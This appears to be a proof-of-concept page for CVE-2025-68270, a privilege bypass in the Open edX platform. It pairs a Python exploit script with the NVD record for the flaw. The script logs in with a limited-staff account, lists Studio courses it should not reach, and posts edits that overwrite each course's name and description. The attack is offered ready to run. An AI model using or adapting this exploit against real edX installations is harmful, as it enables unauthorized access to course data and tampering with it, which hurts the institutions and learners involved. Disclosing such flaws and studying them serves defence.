CVE-2025-68270

import requests # CVE-2025-68270 PoC - Open edX Platform CourseLimitedStaffRole Privilege Bypass # This PoC demonstrates unauthorized access to Studio endpoints TARGET_HOST = "https://vulnerable-openedx.example.com" # Attacker needs an account with CourseLimitedStaffRole at organization level USERNAME = "[email protected]" PASSWORD = "password123" ORGANIZATION_ID = "org_123" COURSE_ID = "course-v1:TestOrg+TEST101+2025" def login(): """Authenticate and obtain session token""" session = requests.Session() login_url = f"{TARGET_HOST}/login" data = { "email": USERNAME, "password": PASSWORD, "next": "/dashboard" } response = session.post(login_url, data=data) return session if response.status_code == 200 else None def list_courses(session): """List courses (unauthorized access)""" # This endpoint should be restricted but is accessible list_url = f"{TARGET_HOST}/api/course_studio/v1/courses" headers = {"Organization": ORGANIZATION_ID} response = session.get(list_url, headers=headers) print(f"List courses response: {response.status_code}") return response.json() def edit_course(session, course_id): """Edit course content (unauthorized access)""" edit_url = f"{TARGET_HOST}/course/{course_id}/settings/details" payload = { "course_name": "Modified by unauthorized user", "course_about": "This course was modified via privilege bypass" } response = session.post(edit_url, data=payload) print(f"Edit course response: {response.status_code}") return response.status_code == 200 def main(): session = login() if not session: print("Login failed") return # Exploit: List courses user shouldn't have access to courses = list_courses(session) print(f"Accessible courses: {courses}") # Exploit: Modify course content if courses: for course in courses: edit_course(session, course.get("id", COURSE_ID)) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-68270", "sourceIdentifier": "[email protected]", "published": "2025-12-16T19:16:00.720", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Open edX Platform is a learning management platform. Prior to commit 05d0d0936daf82c476617257aa6c35f0cd4ca060, CourseLimitedStaffRole users are able to access and edit courses in studio if they are granted the role on an org rather than on a course, and CourseLimitedStaffRole users are able to list courses they have the role on in studio even though they are not meant to have any access on the studio side for the course. Commit 05d0d0936daf82c476617257aa6c35f0cd4ca060 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/openedx/edx-platform/commit/05d0d0936daf82c476617257aa6c35f0cd4ca060", "source": "[email protected]"}, {"url": "https://github.com/openedx/edx-platform/pull/37772", "source": "[email protected]"}, {"url": "https://github.com/openedx/edx-platform/pull/37773", "source": "[email protected]"}, {"url": "https://github.com/openedx/edx-platform/security/advisories/GHSA-rh64-vc2h-7wfj", "source": "[email protected]"}]}}